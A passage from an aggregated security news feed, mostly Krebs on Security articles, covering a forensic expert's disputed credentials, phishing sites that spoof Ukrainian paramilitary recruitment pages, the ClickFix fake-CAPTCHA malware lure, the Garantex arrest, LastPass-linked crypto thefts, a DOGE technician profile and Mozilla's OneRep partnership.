In an interview this week, Harrington said court documents reveal that at least two of Lanterman’s previous clients complained CFS had held their data for ransom over billing disputes. In a declaration (PDF) dated August 2022, the co-founder of the law firm MoreLaw Minneapolis LLC said she hired Lanterman in 2014 to examine several electronic devices after learning that one of their paralegals had a criminal fraud history.

But the law firm said when it pushed back on a consulting bill that was far higher than expected, Lanterman told them CFS would “escalate” its collection efforts if they didn’t pay, including “a claim and lien against the data which will result in a public auction of your data.”

“All of us were flabbergasted by Mr. Lanterman’s email,” wrote MoreLaw co-founder Kimberly Hanlon. “I had never heard of any legitimate forensic company threatening to ‘auction’ off an attorney’s data, particularly knowing that the data is comprised of confidential client data, much of which is sensitive in nature.”

In 2009, a Wisconsin-based manufacturing company that had hired Lanterman for computer forensics balked at paying an $86,000 invoice from CFS, calling it “excessive and unsubstantiated.” The company told a Hennepin County court that on April 15, 2009, CFS conducted an auction of its trade secret information in violation of their confidentiality agreement.

“CFS noticed and conducted a Public Sale of electronic information that was entrusted to them pursuant to the terms of the engagement agreement,” the company wrote. “CFS submitted the highest bid at the Public Sale in the amount of $10,000.”

Lanterman briefly responded to a list of questions about his background (and recent heart diagnosis) on March 24, saying he would send detailed replies the following day. Those replies never materialized. Instead, Lanterman forwarded a recent memo he wrote to the court that attacked Harrington and said his accuser was only trying to take out a competitor. He has not responded to further requests for comment.

“When I attended Upsala, I was a commuter student who lived with my grandparents in Morristown, New Jersey approximately 30 minutes away from Upsala College,” Lanterman explained to the judge (PDF) overseeing a separate ongoing case (PDF) in which he has testified. “With limited resources, I did not participate in campus social events, nor did I attend graduation ceremonies. In 2023, I confirmed with Felician University — which maintains Upsala College’s records — that they could not locate my transcripts or diploma, a situation that they indicated was possibly due to unresolved money-related issues.”

Lanterman was ordered to appear in court on April 3 in the case defended by Perkins Coie, but he did not show up. Instead, he sent a message to the judge withdrawing from the case.

“I am 60 years old,” Lanterman told the judge. “I created my business from nothing. I am done dealing with the likes of individuals like Sean Harrington. And quite frankly, I have been planning at turning over my business to my children for years. That time has arrived.”

Lanterman’s letter leaves the impression that it was his decision to retire. But according to an affidavit (PDF) filed in a Florida case on March 28, Mark Lanterman’s son Sean said he’d made the difficult decision to ask his dad to step down given all the negative media attention.

Mark Rasch, a former federal cybercrime prosecutor who now serves as counsel to the New York cybersecurity intelligence firm Unit 221B, said that if an expert witness is discredited, any defendants who lost cases that were strongly influenced by that expert’s conclusions at trial could have grounds for appeal.

Rasch said law firms who propose an expert witness have a duty in good faith to vet that expert’s qualifications, knowing that those credentials will be subject to cross-examination.

“Federal rules of civil procedure and evidence both require experts to list every case they have testified in as an expert for the past few years,” Rasch said. “Part of that due diligence is pulling up the results of those cases and seeing what the nature of their testimony has been.”

Perhaps the most well-publicized case involving significant forensic findings from Lanterman was the 2018 conviction of Stephen Allwine, who was found guilty of killing his wife two years earlier after attempts at hiring a hitman on the dark net fell through. Allwine is serving a sentence of life in prison, and continues to maintain that he was framed, casting doubt on computer forensic evidence found on 64 electronic devices taken from his home.

On March 24, Allwine petitioned a Minnesota court (PDF) to revisit his case, citing the accusations against Lanterman and his role as a key witness for the prosecution.

☐ ☆ ✇ Security – Cisco Blog

Mobile World Congress 2025: SOC in the Network Operations Center

By: Filipe Lopes — April 3rd 2025 at 12:00
Cisco is the sole supplier of network services to Mobile World Congress, expanding into security and observability, with Splunk.
☐ ☆ ✇ Krebs on Security

When Getting Phished Puts You in Mortal Danger

By: BrianKrebs — March 27th 2025 at 16:39

Many successful phishing attacks result in a financial loss or malware infection. But falling for some phishing scams, like those currently targeting Russians searching online for organizations that are fighting the Kremlin war machine, can cost you your freedom or your life.

The real website of the Ukrainian paramilitary group “Freedom of Russia” legion. The text has been machine-translated from Russian.

Researchers at the security firm Silent Push mapped a network of several dozen phishing domains that spoof the recruitment websites of Ukrainian paramilitary groups, as well as Ukrainian government intelligence sites.

The website legiohliberty[.]army features a carbon copy of the homepage for the Freedom of Russia Legion (a.k.a. “Free Russia Legion”), a three-year-old Ukraine-based paramilitary unit made up of Russian citizens who oppose Vladimir Putin and his invasion of Ukraine.

The phony version of that website copies the legitimate site — legionliberty[.]army — providing an interactive Google Form where interested applicants can share their contact and personal details. The form asks visitors to provide their name, gender, age, email address and/or Telegram handle, country, citizenship, experience in the armed forces; political views; motivations for joining; and any bad habits.

“Participation in such anti-war actions is considered illegal in the Russian Federation, and participating citizens are regularly charged and arrested,” Silent Push wrote in a report released today. “All observed campaigns had similar traits and shared a common objective: collecting personal information from site-visiting victims. Our team believes it is likely that this campaign is the work of either Russian Intelligence Services or a threat actor with similarly aligned motives.”

Silent Push’s Zach Edwards said the fake Legion Liberty site shared multiple connections with rusvolcorps[.]net. That domain mimics the recruitment page for a Ukrainian far-right paramilitary group called the Russian Volunteer Corps (rusvolcorps[.]com), and uses a similar Google Forms page to collect information from would-be members.

Other domains Silent Push connected to the phishing scheme include: ciagov[.]icu, which mirrors the content on the official website of the U.S. Central Intelligence Agency; and hochuzhitlife[.]com, which spoofs the Ministry of Defense of Ukraine & General Directorate of Intelligence (whose actual domain is hochuzhit[.]com).

According to Edwards, there are no signs that these phishing sites are being advertised via email. Rather, it appears those responsible are promoting them by manipulating the search engine results shown when someone searches for one of these anti-Putin organizations.

In August 2024, security researcher Artem Tamoian posted on Twitter/X about how he received startlingly different results when he searched for “Freedom of Russia legion” in Russia’s largest domestic search engine Yandex versus Google.com. The top result returned by Google was the legion’s actual website, while the first result on Yandex was a phishing page targeting the group.

“I think at least some of them are surely promoted via search,” Tamoian said of the phishing domains. “My first thread on that accuses Yandex, but apart from Yandex those websites are consistently ranked above legitimate in DuckDuckGo and Bing. Initially, I didn’t realize the scale of it. They keep appearing to this day.”

Tamoian, a native Russian who left the country in 2019, is the founder of the cyber investigation platform malfors.com. He recently discovered two other sites impersonating the Ukrainian paramilitary groups — legionliberty[.]world and rusvolcorps[.]ru — and reported both to Cloudflare. When Cloudflare responded by blocking the sites with a phishing warning, the real Internet address of these sites was exposed as belonging to a known “bulletproof hosting” network called Stark Industries Solutions Ltd.

Stark Industries Solutions appeared two weeks before Russia invaded Ukraine in February 2022, materializing out of nowhere with hundreds of thousands of Internet addresses in its stable — many of them originally assigned to Russian government organizations. In May 2024, KrebsOnSecurity published a deep dive on Stark, which has repeatedly been used to host infrastructure for distributed denial-of-service (DDoS) attacks, phishing, malware and disinformation campaigns from Russian intelligence agencies and pro-Kremlin hacker groups.

In March 2023, Russia’s Supreme Court designated the Freedom of Russia legion as a terrorist organization, meaning that Russians caught communicating with the group could face between 10 and 20 years in prison.

Tamoian said those searching online for information about these paramilitary groups have become easy prey for Russian security services.

“I started looking into those phishing websites, because I kept stumbling upon news that someone gets arrested for trying to join [the] Ukrainian Army or for trying to help them,” Tamoian told KrebsOnSecurity. “I have also seen reports [of] FSB contacting people impersonating Ukrainian officers, as well as using fake Telegram bots, so I thought fake websites might be an option as well.”

Search results showing news articles about people in Russia being sentenced to lengthy prison terms for attempting to aid Ukrainian paramilitary groups.

Tamoian said reports surface regularly in Russia about people being arrested for trying carry out an action requested by a “Ukrainian recruiter,” with the courts unfailingly imposing harsh sentences regardless of the defendant’s age.

“This keeps happening regularly, but usually there are no details about how exactly the person gets caught,” he said. “All cases related to state treason [and] terrorism are classified, so there are barely any details.”

Tamoian said while he has no direct evidence linking any of the reported arrests and convictions to these phishing sites, he is certain the sites are part of a larger campaign by the Russian government.

“Considering that they keep them alive and keep spawning more, I assume it might be an efficient thing,” he said. “They are on top of DuckDuckGo and Yandex, so it unfortunately works.”

Further reading: Silent Push report, Russian Intelligence Targeting its Citizens and Informants.

☐ ☆ ✇ Security – Cisco Blog

The Benefits of a Broad and Open Integration Ecosystem

By: Ben Greenbaum — March 26th 2025 at 12:00
Since inception, Cisco XDR has followed the Open XDR philosophy. We integrate telemetry and data from dozens of Cisco and third-party security solutions.
☐ ☆ ✇ Krebs on Security

ClickFix: How to Infect Your PC in Three Easy Steps

By: BrianKrebs — March 14th 2025 at 22:15

A clever malware deployment scheme first spotted in targeted attacks last year has now gone mainstream. In this scam, dubbed “ClickFix,” the visitor to a hacked or malicious website is asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes Microsoft Windows to download password-stealing malware.

ClickFix attacks mimic the “Verify You are a Human” tests that many websites use to separate real visitors from content-scraping bots. This particular scam usually starts with a website popup that looks something like this:

This malware attack pretends to be a CAPTCHA intended to separate humans from bots.

Clicking the “I’m not a robot” button generates a pop-up message asking the user to take three sequential steps to prove their humanity.

Executing this series of keypresses prompts Windows to download password-stealing malware.

Step 1 involves simultaneously pressing the keyboard key with the Windows icon and the letter “R,” which opens a Windows “Run” prompt that will execute any specified program that is already installed on the system.

Step 2 asks the user to press the “CTRL” key and the letter “V” at the same time, which pastes malicious code from the site’s virtual clipboard.

Step 3 — pressing the “Enter” key — causes Windows to download and launch malicious code through “mshta.exe,” a Windows program designed to run Microsoft HTML application files.

“This campaign delivers multiple families of commodity malware, including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT,” Microsoft wrote in a blog post on Thursday. “Depending on the specific payload, the specific code launched through mshta.exe varies. Some samples have downloaded PowerShell, JavaScript, and portable executable (PE) content.”

According to Microsoft, hospitality workers are being tricked into downloading credential-stealing malware by cybercriminals impersonating Booking.com. The company said attackers have been sending malicious emails impersonating Booking.com, often referencing negative guest reviews, requests from prospective guests, or online promotion opportunities — all in a bid to convince people to step through one of these ClickFix attacks.

In November 2024, KrebsOnSecurity reported that hundreds of hotels that use booking.com had been subject to targeted phishing attacks. Some of those lures worked, and allowed thieves to gain control over booking.com accounts. From there, they sent out phishing messages asking for financial information from people who’d just booked travel through the company’s app.

Earlier this month, the security firm Arctic Wolf warned about ClickFix attacks targeting people working in the healthcare sector. The company said those attacks leveraged malicious code stitched into the widely used physical therapy video site HEP2go that redirected visitors to a ClickFix prompt.

An alert (PDF) released in October 2024 by the U.S. Department of Health and Human Services warned that the ClickFix attack can take many forms, including fake Google Chrome error pages and popups that spoof Facebook.

ClickFix tactic used by malicious websites impersonating Google Chrome, Facebook, PDFSimpli, and reCAPTCHA. Source: Sekoia.

The ClickFix attack — and its reliance on mshta.exe — is reminiscent of phishing techniques employed for years that hid exploits inside Microsoft Office macros. Malicious macros became such a common malware threat that Microsoft was forced to start blocking macros by default in Office documents that try to download content from the web.

Alas, the email security vendor Proofpoint has documented plenty of ClickFix attacks via phishing emails that include HTML attachments spoofing Microsoft Office files. When opened, the attachment displays an image of Microsoft Word document with a pop-up error message directing users to click the “Solution” or “How to Fix” button.

HTML files containing ClickFix instructions. Examples for attachments named “Report_” (on the left) and “scan_doc_” (on the right). Image: Proofpoint.

Organizations that wish to do so can take advantage of Microsoft Group Policy restrictions to prevent Windows from executing the “run” command when users hit the Windows key and the “R” key simultaneously.

☐ ☆ ✇ WIRED

The Violent Rise of ‘No Lives Matter’

By: Ali Winston — March 12th 2025 at 16:50
“No Lives Matter” has emerged in recent months as a particularly violent splinter group within the extremist crime network known as Com and 764, and experts are at a loss for how to stop its spread.
☐ ☆ ✇ Krebs on Security

Alleged Co-Founder of Garantex Arrested in India

By: BrianKrebs — March 11th 2025 at 16:49

Authorities in India today arrested the alleged co-founder of Garantex, a cryptocurrency exchange sanctioned by the U.S. government in 2022 for facilitating tens of billions of dollars in money laundering by transnational criminal and cybercriminal organizations. Sources close to the investigation told KrebsOnSecurity the Lithuanian national Aleksej Besciokov, 46, was apprehended while vacationing on the coast of India with his family.

Aleksej Bešciokov, “proforg,” “iram”. Image: U.S. Secret Service.

On March 7, the U.S. Department of Justice (DOJ) unsealed an indictment against Besciokov and the other alleged co-founder of Garantex, Aleksandr Mira Serda, 40, a Russian national living in the United Arab Emirates.

Launched in 2019, Garantex was first sanctioned by the U.S. Treasury Office of Foreign Assets Control in April 2022 for receiving hundreds of millions in criminal proceeds, including funds used to facilitate hacking, ransomware, terrorism and drug trafficking. Since those penalties were levied, Garantex has processed more than $60 billion, according to the blockchain analysis company Elliptic.

“Garantex has been used in sanctions evasion by Russian elites, as well as to launder proceeds of crime including ransomware, darknet market trade and thefts attributed to North Korea’s Lazarus Group,” Elliptic wrote in a blog post. “Garantex has also been implicated in enabling Russian oligarchs to move their wealth out of the country, following the invasion of Ukraine.”

The DOJ alleges Besciokov was Garantex’s primary technical administrator and responsible for obtaining and maintaining critical Garantex infrastructure, as well as reviewing and approving transactions. Mira Serda is allegedly Garantex’s co-founder and chief commercial officer.

Image: elliptic.co

In conjunction with the release of the indictments, German and Finnish law enforcement seized servers hosting Garantex’s operations. A “most wanted” notice published by the U.S. Secret Service states that U.S. authorities separately obtained earlier copies of Garantex’s servers, including customer and accounting databases. Federal investigators say they also froze over $26 million in funds used to facilitate Garantex’s money laundering activities.

Besciokov was arrested within the past 24 hours while vacationing with his family in Varkala, a major coastal city in the southwest Indian state of Kerala. An officer with the local police department in Varkala confirmed Besciokov’s arrest, and said the suspect will appear in a Delhi court on March 14 to face charges.

Varkala Beach in Kerala, India. Image: Shutterstock, Dmitry Rukhlenko.

The DOJ’s indictment says Besciokov went by the hacker handle “proforg.” This nickname corresponds to the administrator of a 20-year-old Russian language forum dedicated to nudity and crudity called “udaff.”

Besciokov and Mira Serda are each charged with one count of conspiracy to commit money laundering, which carries a maximum sentence of 20 years in prison. Besciokov is also charged with one count of conspiracy to violate the International Economic Emergency Powers Act—which also carries a maximum sentence of 20 years in person—and with conspiracy to operate an unlicensed money transmitting business, which carries a maximum sentence of five years in prison.

☐ ☆ ✇ Krebs on Security

Feds Link $150M Cyberheist to 2022 LastPass Hacks

By: BrianKrebs — March 8th 2025 at 01:20

In September 2023, KrebsOnSecurity published findings from security researchers who concluded that a series of six-figure cyberheists across dozens of victims resulted from thieves cracking master passwords stolen from the password manager service LastPass in 2022. In a court filing this week, U.S. federal agents investigating a spectacular $150 million cryptocurrency heist said they had reached the same conclusion.

On March 6, federal prosecutors in northern California said they seized approximately $24 million worth of cryptocurrencies that were clawed back following a $150 million cyberheist on Jan. 30, 2024. The complaint refers to the person robbed only as “Victim-1,” but according to blockchain security researcher ZachXBT the theft was perpetrated against Chris Larsen, the co-founder of the cryptocurrency platform Ripple. ZachXBT was the first to report on the heist.

This week’s action by the government merely allows investigators to officially seize the frozen funds. But there is an important conclusion in this seizure document: It basically says the U.S. Secret Service and the FBI agree with the findings of the LastPass breach story published here in September 2023.

That piece quoted security researchers who said they were witnessing six-figure crypto heists several times each month that all appeared to be the result of crooks cracking master passwords for the password vaults stolen from LastPass in 2022.

“The Federal Bureau of Investigation has been investigating these data breaches, and law enforcement agents investigating the instant case have spoken with FBI agents about their investigation,” reads the seizure complaint, which was written by a U.S. Secret Service agent. “From those conversations, law enforcement agents in this case learned that the stolen data and passwords that were stored in several victims’ online password manager accounts were used to illegally, and without authorization, access the victims’ electronic accounts and steal information, cryptocurrency, and other data.”

The document continues:

“Based on this investigation, law enforcement had probable cause to believe the same attackers behind the above-described commercial online password manager attack used a stolen password held in Victim 1’s online password manager account and, without authorization, accessed his cryptocurrency wallet/account.”

Working with dozens of victims, security researchers Nick Bax and Taylor Monahan found that none of the six-figure cyberheist victims appeared to have suffered the sorts of attacks that typically preface a high-dollar crypto theft, such as the compromise of one’s email and/or mobile phone accounts, or SIM-swapping attacks.

They discovered the victims all had something else in common: Each had at one point stored their cryptocurrency seed phrase — the secret code that lets anyone gain access to your cryptocurrency holdings — in the “Secure Notes” area of their LastPass account prior to the 2022 breaches at the company.

Bax and Monahan found another common theme with these robberies: They all followed a similar pattern of cashing out, rapidly moving stolen funds to a dizzying number of drop accounts scattered across various cryptocurrency exchanges.

According to the government, a similar level of complexity was present in the $150 million heist against the Ripple co-founder last year.

“The scale of a theft and rapid dissipation of funds would have required the efforts of multiple malicious actors, and was consistent with the online password manager breaches and attack on other victims whose cryptocurrency was stolen,” the government wrote. “For these reasons, law enforcement agents believe the cryptocurrency stolen from Victim 1 was committed by the same attackers who conducted the attack on the online password manager, and cryptocurrency thefts from other similarly situated victims.”

Reached for comment, LastPass said it has seen no definitive proof — from federal investigators or others — that the cyberheists in question were linked to the LastPass breaches.

“Since we initially disclosed this incident back in 2022, LastPass has worked in close cooperation with multiple representatives from law enforcement,” LastPass said in a written statement. “To date, our law enforcement partners have not made us aware of any conclusive evidence that connects any crypto thefts to our incident. In the meantime, we have been investing heavily in enhancing our security measures and will continue to do so.”

On August 25, 2022, LastPass CEO Karim Toubba told users the company had detected unusual activity in its software development environment, and that the intruders stole some source code and proprietary LastPass technical information. On Sept. 15, 2022, LastPass said an investigation into the August breach determined the attacker did not access any customer data or password vaults.

But on Nov. 30, 2022, LastPass notified customers about another, far more serious security incident that the company said leveraged data stolen in the August breach. LastPass disclosed that criminal hackers had compromised encrypted copies of some password vaults, as well as other personal information.

Experts say the breach would have given thieves “offline” access to encrypted password vaults, theoretically allowing them all the time in the world to try to crack some of the weaker master passwords using powerful systems that can attempt millions of password guesses per second.

Researchers found that many of the cyberheist victims had chosen master passwords with relatively low complexity, and were among LastPass’s oldest customers. That’s because legacy LastPass users were more likely to have master passwords that were protected with far fewer “iterations,” which refers to the number of times your password is run through the company’s encryption routines. In general, the more iterations, the longer it takes an offline attacker to crack your master password.

Over the years, LastPass forced new users to pick longer and more complex master passwords, and they increased the number of iterations on multiple occasions by several orders of magnitude. But researchers found strong indications that LastPass never succeeded in upgrading many of its older customers to the newer password requirements and protections.

Asked about LastPass’s continuing denials, Bax said that after the initial warning in our 2023 story, he naively hoped people would migrate their funds to new cryptocurrency wallets.

“While some did, the continued thefts underscore how much more needs to be done,” Bax told KrebsOnSecurity. “It’s validating to see the Secret Service and FBI corroborate our findings, but I’d much rather see fewer of these hacks in the first place. ZachXBT and SEAL 911 reported yet another wave of thefts as recently as December, showing the threat is still very real.”

Monahan said LastPass still hasn’t alerted their customers that their secrets—especially those stored in “Secure Notes”—may be at risk.

“Its been two and a half years since LastPass was first breached [and] hundreds of millions of dollars has been stolen from individuals and companies around the globe,” Monahan said. “They could have encouraged users to rotate their credentials. They could’ve prevented millions and millions of dollars from being stolen by these threat actors. But  instead they chose to deny that their customers were are risk and blame the victims instead.”

☐ ☆ ✇ Krebs on Security

Who is the DOGE and X Technician Branden Spikes?

By: BrianKrebs — March 7th 2025 at 00:54

At 49, Branden Spikes isn’t just one of the oldest technologists who has been involved in Elon Musk’s Department of Government Efficiency (DOGE). As the current director of information technology at X/Twitter and an early hire at PayPal, Zip2, Tesla and SpaceX, Spikes is also among Musk’s most loyal employees. Here’s a closer look at this trusted Musk lieutenant, whose Russian ex-wife was once married to Elon’s cousin.

The profile of Branden Spikes on X.

When President Trump took office again in January, he put the world’s richest man — Elon Musk — in charge of the U.S. Digital Service, and renamed the organization as DOGE. The group is reportedly staffed by at least 50 technologists, many of whom have ties to Musk’s companies.

DOGE has been enabling the president’s ongoing mass layoffs and firings of federal workers, largely by seizing control over computer systems and government data for a multitude of federal agencies, including the Social Security Administration, the Department of Homeland Security, the Office of Personnel Management, and the Treasury Department.

It is difficult to find another person connected to DOGE who has stronger ties to Musk than Branden Spikes. A native of California, Spikes initially teamed up with Musk in 1997 as a lead systems engineer for the software company Zip2, the first major venture for Musk. In 1999, Spikes was hired as director of IT at PayPal, and in 2002 he became just the fourth person hired at SpaceX.

In 2012, Spikes launched Spikes Security, a software product that sought to create a compartmentalized or “sandboxed” web browser that could insulate the user from malware attacks. A review of spikes.com in the Wayback Machine shows that as far back as 1998, Musk could be seen joining Spikes for team matches in the online games Quake and Quake II. In 2016, Spikes Security was merged with another security suite called Aurionpro, with the combined company renamed Cyberinc.

A snapshot of spikes.com from 1998 shows Elon Musk’s profile in Spike’s clan for the games Quake and Quake II.

Spikes’s LinkedIn profile says he was appointed head of IT at X in February 2025. And although his name shows up on none of the lists of DOGE employees circulated by various media outlets, multiple sources told KrebsOnSecurity that Spikes was working with DOGE and operates within Musk’s inner circle of trust.

In a conversation with KrebsOnSecurity, Spikes said he is dedicated to his country and to saving it from what he sees as certain ruin.

“Myself, I was raised by a southern conservative family in California and I strongly believe in America and her future,” Spikes said. “This is why I volunteered for two months in DC recently to help DOGE save us from certain bankruptcy.”

Spikes told KrebsOnSecurity that he recently decided to head back home and focus on his job as director of IT at X.

“I loved it, but ultimately I did not want to leave my hometown and family back in California,” Spikes said of his tenure at DOGE. “After a couple of months it became clear that to continue helping I would need to move to DC and commit a lot more time, so I politely bowed out.”

Prior to founding Spikes Security, Branden Spikes was married to a native Russian woman named Natalia whom he’d met at a destination wedding in South America in 2003.

Branden and Natalia’s names are both on the registration records for the domain name orangetearoom[.]com. This domain, which DomainTools.com says was originally registered by Branden in 2009, is the home of a tax-exempt charity in Los Angeles called the California Russian Association.

Here is a photo from a 2011 event organized by the California Russian Association, showing Branden and Natalia at one of its “White Nights” charity fundraisers:

Branden and Natalia Spikes, on left, in 2011. The man on the far right is Ivan Y. Podvalov, a board member of the Kremlin-aligned Congress of Russian Americans (CRA). The man in the center is Feodor Yakimoff, director of operations at the Transib Global Sourcing Group, and chairman of the Russian Imperial Charity Balls, which works in concert with the Russian Heritage Foundation.

In 2011, the Spikes couple got divorced, and Natalia changed her last name to Haldeman. That is not her maiden name, which appears to be “Libina.” Rather, Natalia acquired the surname Haldeman in 1998, when she married Elon Musk’s cousin.

Reeve Haldeman is the son of Scott Haldeman, who is the brother of Elon Musk’s mother, Maye Musk. Divorce records show Reeve and Natalia officially terminated their marriage in 2007. Reeve Haldeman did not respond to a request for comment.

A review of other domain names connected to Natalia Haldeman’s email address show she has registered more than a dozen domains over the years that are tied to the California Russian Association, and an apparently related entity called the Russian Heritage Foundation, Inc.:

russianamericans.org
russianamericanstoday.com
russianamericanstoday.org
russiancalifornia.org
russianheritagefoundation.com
russianheritagefoundation.org
russianwhitenights.com
russianwhitenights.org
theforafoundation.org
thegoldentearoom.com
therussianheritagefoundation.org
tsarinahome.com

Ms. Haldeman did not respond to requests for comment. Her name and contact information appears in the registration records for these domains dating back to 2010, and a document published by ProPublica show that by 2016 Natalia Haldeman was appointed CEO of the California Russian Foundation.

The domain name that bears both Branden’s and Natalia’s names — orangetearoom.com — features photos of Ms. Haldeman at fundraising events for the Russian foundation through 2014. Additional photos of her and many of the same people can be seen through 2023 at another domain she registered in 2010 — russianheritagefoundation.com.

A photo from Natalia Haldeman’s Facebook page shows her mother (left) pictured with Maye Musk, Elon Musk’s mother, in 2022.

The photo of Branden and Natalia above is from one such event in 2011 (tied to russianwhitenights.org, another Haldeman domain). The person on the right in that image — Ivan Y. Podvalov — appears in many fundraising event photos published by the foundation over the past decade. Podvalov is a board member of the Congress of Russian Americans (CRA), a nonprofit group that is known for vehemently opposing U.S. financial and legal sanctions against Russia.

Writing for The Insider in 2022, journalist Diana Fishman described how the CRA has engaged in outright political lobbying, noting that the organization in June 2014 sent a letter to President Obama and the secretary of the United Nations, calling for an end to the “large-scale US intervention in Ukraine and the campaign to isolate Russia.”

“The US military contingents must be withdrawn immediately from the Eastern European region, and NATO’s enlargement efforts and provocative actions against Russia must cease,” the message read.

The Insider said the CRA director sent another two letters, this time to President Donald Trump, in 2017 and 2018.

“One was a request not to sign a law expanding sanctions against Russia,” Fishman wrote. “The other regretted the expulsion of 60 Russian diplomats from the United States and urged not to jump to conclusions on Moscow’s involvement in the poisoning of Sergei Skripal.”

The nonprofit tracking website CauseIQ.com reports that The Russian Heritage Foundation, Inc. is now known as Constellation of Humanity.

The Russian Heritage Foundation and the California Russian Association both promote the interests of the Russian Orthodox Church. This page indexed by Archive.org from russiancalifornia.org shows The California Russian Foundation organized a community effort to establish an Orthodox church in Orange County, Calif.

A press release from the Russian Orthodox Church Outside of Russia (ROCOR) shows that in 2021 the Russian Heritage Foundation donated money to organize a conference for the Russian Orthodox Church in Serbia.

A review of the “Partners” listed on the Spikes’ jointly registered domain — orangetearoom.com — shows the organization worked with a marketing company called Russian American Media. Reporting by KrebsOnSecurity last year showed that Russian American Media also partners with the problematic people-search service Radaris, which was formed by two native Russian brothers in Massachusetts who have built a fleet of consumer data brokers and Russian affiliate programs.

When asked about his ex-wife’s history, Spikes said she has a good heart and bears no ill-will toward anyone.

“I attended several of Natalia’s social events over the years we were together and can assure you that she’s got the best intentions with those,” Spikes told KrebsOnSecurity. “There’s no funny business going on. It is just a way for those friendly immigrants to find resources amongst each other to help get settled in and chase the American dream. I mean, they’re not unlike the immigrants from other countries who come to America and try to find each other and help each other find others who speak the language and share in the building of their businesses here in America.”

Spikes said his own family roots go back deeply into American history, sharing that his 6th great grandfather was Alexander Hamilton on his mom’s side, and Jessie James on his dad’s side.

“My family roots are about as American as you can get,” he said. “I’ve also been entrusted with building and safeguarding Elon’s companies since 1999 and have a keen eye (as you do) for bad actors, so have enough perspective to tell you that Natalia has no bad blood and that she loves America.”

Of course, this perspective comes from someone who has the utmost regard for the interests of the “special government employee” Mr. Musk, who has been bragging about tossing entire federal agencies into the “wood chipper,” and who recently wielded an actual chainsaw on stage while referring to it as the “chainsaw for bureaucracy.”

“Elon’s intentions are good and you can trust him,” Spikes assured.

A special note of thanks for research assistance goes to Jacqueline Sweet, an independent investigative journalist whose work has been published in The Guardian, Rolling Stone, POLITICO and The Intercept.

☐ ☆ ✇ WIRED

1 Million Third-Party Android Devices Have a Secret Backdoor for Scammers

By: Lily Hay Newman, Matt Burgess — March 5th 2025 at 11:00
New research shows at least a million inexpensive Android devices—from TV streaming boxes to car infotainment systems—are compromised to allow bad actors to commit ad fraud and other cybercrime.
☐ ☆ ✇ Security – Cisco Blog

Cisco Live Melbourne SOC Report

By: Shaun Coulter — February 27th 2025 at 13:00
Learn how the SOC team supported Cisco Live Melbourne and some of the more interesting findings from four days of threat hunting on the network.
☐ ☆ ✇ WIRED

Inside the Telegram Groups Doxing Women for Their Facebook Posts

By: Anna Wolfe, Sarah Cammarata — February 24th 2025 at 18:26
A WIRED investigation goes inside the Telegram groups targeting women who joined “Are We Dating the Same Guy?” groups on Facebook with doxing, harassment, and sharing of nonconsensual intimate images.
☐ ☆ ✇ Krebs on Security

Nearly a Year Later, Mozilla is Still Promoting OneRep

By: BrianKrebs — February 13th 2025 at 20:14

In mid-March 2024, KrebsOnSecurity revealed that the founder of the personal data removal service Onerep also founded dozens of people-search companies. Shortly after that investigation was published, Mozilla said it would stop bundling Onerep with the Firefox browser and wind down its partnership with the company. But nearly a year later, Mozilla is still promoting it to Firefox users.

Mozilla offers Onerep to Firefox users on a subscription basis as part of Mozilla Monitor Plus. Launched in 2018 under the name Firefox Monitor, Mozilla Monitor also checks data from the website Have I Been Pwned? to let users know when their email addresses or password are leaked in data breaches.

The ink on that partnership agreement had barely dried before KrebsOnSecurity published a story showing that Onerep’s Belarusian CEO and founder Dimitiri Shelest launched dozens of people-search services since 2010, including a still-active data broker called Nuwber that sells background reports on people. This seemed to contradict Onerep’s stated motto, “We believe that no one should compromise personal online security and get a profit from it.”

Shelest released a lengthy statement (PDF) wherein he acknowledged maintaining an ownership stake in Nuwber, a consumer data broker he founded in 2015 — around the same time he started Onerep.

Onerep.com CEO and founder Dimitri Shelest, as pictured on the “about” page of onerep.com.

Shelest maintained that Nuwber has “zero cross-over or information-sharing with Onerep,” and said any other old domains that may be found and associated with his name are no longer being operated by him.

“I get it,” Shelest wrote. “My affiliation with a people search business may look odd from the outside. In truth, if I hadn’t taken that initial path with a deep dive into how people search sites work, Onerep wouldn’t have the best tech and team in the space. Still, I now appreciate that we did not make this more clear in the past and I’m aiming to do better in the future.”

When asked to comment on the findings, Mozilla said then that although customer data was never at risk, the outside financial interests and activities of Onerep’s CEO did not align with their values.

“We’re working now to solidify a transition plan that will provide customers with a seamless experience and will continue to put their interests first,” Mozilla said.

In October 2024, Mozilla published a statement saying the search for a different provider was taking longer than anticipated.

“While we continue to evaluate vendors, finding a technically excellent and values-aligned partner takes time,” Mozilla wrote. “While we continue this search, Onerep will remain the backend provider, ensuring that we can maintain uninterrupted services while we continue evaluating new potential partners that align more closely with Mozilla’s values and user expectations. We are conducting thorough diligence to find the right vendor.”

Asked for an update, Mozilla said the search for a replacement partner continues.

“The work’s ongoing but we haven’t found the right alternative yet,” Mozilla said in an emailed statement. “Our customers’ data remains safe, and since the product provides a lot of value to our subscribers, we’ll continue to offer it during this process.”

It’s a win-win for Mozilla that they’ve received accolades for their principled response while continuing to partner with Onerep almost a year later. But if it takes so long to find a suitable replacement, what does that say about the personal data removal industry itself?

Onerep appears to be working in partnership with another problematic people-search service: Radaris, which has a history of ignoring opt-out requests or failing to honor them. A week before breaking the story about Onerep, KrebsOnSecurity published research showing the co-founders of Radaris were two native Russian brothers who’d built a vast network of affiliate marketing programs and consumer data broker services.

Lawyers for the Radaris co-founders threatened to sue KrebsOnSecurity unless that story was retracted in full, claiming the founders were in fact Ukrainian and that our reporting had defamed the brothers by associating them with the actions of Radaris. Instead, we published a follow-up investigation which showed that not only did the brothers from Russia create Radaris, for many years they issued press releases quoting a fictitious CEO seeking money from investors.

Several readers have shared emails they received from Radaris after attempting to remove their personal data, and those messages show Radaris has been promoting Onerep.

An email from Radaris promoting Onerep.

❌